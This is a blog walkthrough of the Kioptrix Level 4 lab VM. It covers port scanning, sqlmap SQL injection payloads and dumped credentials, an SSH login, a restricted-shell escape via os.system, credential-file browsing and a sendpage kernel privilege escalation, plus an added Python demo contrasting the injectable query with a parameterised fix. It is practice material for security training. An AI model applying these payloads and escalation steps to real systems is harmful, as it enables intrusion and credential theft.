Friday, May 22, 2015

Kioptrix Level 4 Walkthrough

This is the first in a long series of Vulnerable Virtual Machine walkthroughs that I'll be posting to this site. By looking at the date of my last post, one would assume that I've gone dormant, but that's definitely not the case. So without further ado, I bring you Kioptrix Level 4.


root@kali:~# nmap
Starting Nmap 6.47 ( ) at 2015-05-21 09:05 EDT
Nmap scan report for
Host is up (0.00032s latency).
Not shown: 566 closed ports, 430 filtered ports
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:C2:50:41 (Cadmus Computer Systems)

Nmap done: 19 IP addresses (3 hosts up) scanned in 9.10 seconds

Visiting the webpage on port 80 revealed a login page which may be vulnerable to some SQL injection:

Using a bunch of the usual combinations, I was able to provoke the site into revealing the underlying DBMS (MySQL).
With this information I was able to specify the DBMS in my sqlmap invocation. sqlmap output:

root@kali:~# sqlmap -u "" --dbms=MySQL --level=5 --risk=3 --data="myusername=admin&mypassword=test" --dump
Ultimately revealing usernames and passwords within the underlying database:
Place: POST
Parameter: mypassword
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-4827' OR (7207=7207) AND 'wyxA'='wyxA

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: myusername=admin&mypassword=test' AND 8831=BENCHMARK(5000000,MD5(0x46556262)) AND 'KxNZ'='KxNZ
[09:16:14] [INFO] testing MySQL
[09:16:14] [INFO] confirming MySQL
[09:16:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[09:16:14] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:16:14] [INFO] fetching current database
[09:16:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:16:14] [INFO] retrieved: members
[09:16:15] [INFO] fetching tables for database: 'members'
[09:16:15] [INFO] fetching number of tables for database 'members'
[09:16:15] [INFO] retrieved: 1
[09:16:15] [INFO] retrieved: members
[09:16:15] [INFO] fetching columns for table 'members' in database 'members'
[09:16:15] [INFO] retrieved: 3
[09:16:15] [INFO] retrieved: id
[09:16:16] [INFO] retrieved: username
[09:16:16] [INFO] retrieved: password
[09:16:17] [INFO] fetching entries for table 'members' in database 'members'
[09:16:17] [INFO] fetching number of entries for table 'members' in database 'members'
[09:16:17] [INFO] retrieved: 2
[09:16:17] [INFO] retrieved: 1
[09:16:17] [INFO] retrieved: MyNameIsJohn
[09:16:18] [INFO] retrieved: john
[09:16:18] [INFO] retrieved: 2
[09:16:19] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[09:16:20] [INFO] retrieved: robert
[09:16:21] [INFO] analyzing table dump for possible password hashes
Database: members
Table: members
[2 entries]
| id | username | password              |
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |

[09:16:21] [INFO] table 'members.members' dumped to CSV file '/usr/share/sqlmap/output/'
[09:16:21] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/'

[*] shutting down at 09:16:21

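The boolean-based blind payload sqlmap reported above only works because the login page splices the submitted password straight into the SQL text. This added example (not code from the Kioptrix VM, whose PHP source is not shown on this page) rebuilds the dumped members table in an in-memory SQLite database and puts the concatenated query beside a parameterised one; the table schema is an assumption, and only the two dumped rows and the payload come from the page.

```python
import sqlite3

# Constructed stand-in for the members table sqlmap dumped: the columns
# (id, username, password) and both rows are from the dump above, the
# SQLite schema is an assumption. Note the passwords are stored in clear
# text, exactly as the dump shows, which is a finding in its own right.
ROWS = [(1, "john", "MyNameIsJohn"), (2, "robert", "ADGAdsafdfwt4gadfga==")]

# The boolean-based blind payload sqlmap reported for the mypassword field.
PAYLOAD = "-4827' OR (7207=7207) AND 'wyxA'='wyxA"


def make_db():
    """Build the throwaway members database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", ROWS)
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string concatenation, the bug class sqlmap found.
    The password is pasted into the SQL text, so the quote in the payload
    closes the literal and the rest is parsed as SQL: AND binds tighter
    than OR, so the WHERE clause becomes (user AND pass) OR (true AND true)
    and a row comes back for any username at all."""
    sql = ("SELECT id FROM members WHERE username='" + username
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn, username, password):
    """Same lookup with bound parameters: the driver passes the password as
    a value, so the injected quote and OR never reach the SQL parser."""
    sql = "SELECT id FROM members WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload:", login_vulnerable(db, "admin", PAYLOAD))
    print("fixed, payload:     ", login_fixed(db, "admin", PAYLOAD))
    print("fixed, real creds:  ", login_fixed(db, "john", "MyNameIsJohn"))
```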

Now let's attempt to SSH in with john's credentials:

root@kali:~# ssh john@
The authenticity of host ' (' can't be established.
RSA key fingerprint is 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (RSA) to the list of known hosts.
john@'s password:
Connection closed by
root@kali:~# ssh john@
john@'s password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls

Awesome, the credentials worked, but now we're trapped in a stupid shell... how do we escape?

Research on how to escape this shell led me to the following webpage:

Worked like a charm!

john:~$ echo os.system('/bin/bash')

john@Kioptrix4:~$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

Now it's time to take a look around and escalate privilege; it looks like this Linux kernel is vulnerable to some of the old favorites.

john@Kioptrix4:~$ cat /etc/sudoers
cat: /etc/sudoers: Permission denied
john@Kioptrix4:~$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
john@Kioptrix4:~$ pwd
john@Kioptrix4:~$ ls
john@Kioptrix4:~$ cd ..
john@Kioptrix4:/home$ ls
john  loneferret  robert
john@Kioptrix4:/home$ cd loneferret
john@Kioptrix4:/home/loneferret$ ls
john@Kioptrix4:/home/loneferret$ ls -al
total 44
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .
drwxr-xr-x 5 root       root       4096 2012-02-04 18:05 ..
-rw------- 1 loneferret loneferret   62 2012-02-06 20:24 .bash_history
-rw-r--r-- 1 loneferret loneferret  220 2012-02-04 09:58 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc
-rw-r--r-- 1 loneferret loneferret    1 2012-02-05 10:37 .lhistory
-rw------- 1 root       root         68 2012-02-04 10:05 .my.cnf.5086
-rw------- 1 root       root          1 2012-02-04 10:05 .mysql.5086
-rw------- 1 loneferret loneferret    1 2012-02-05 10:38 .mysql_history
-rw------- 1 loneferret loneferret    9 2012-02-06 16:39 .nano_history
-rw-r--r-- 1 loneferret loneferret  586 2012-02-04 09:58 .profile
-rw-r--r-- 1 loneferret loneferret    0 2012-02-04 10:01 .sudo_as_admin_successful
john@Kioptrix4:/home/loneferret$ more .sudo_as_admin_successful
john@Kioptrix4:/home/loneferret$ more .bash_history
.bash_history: Permission denied

As you can see, I came across lots of interesting things, including MySQL and nice stuff in the user directories, but it was my old faithful Linux Sendpage exploit which brought home the bacon.

john@Kioptrix4:~$ ./sendpage

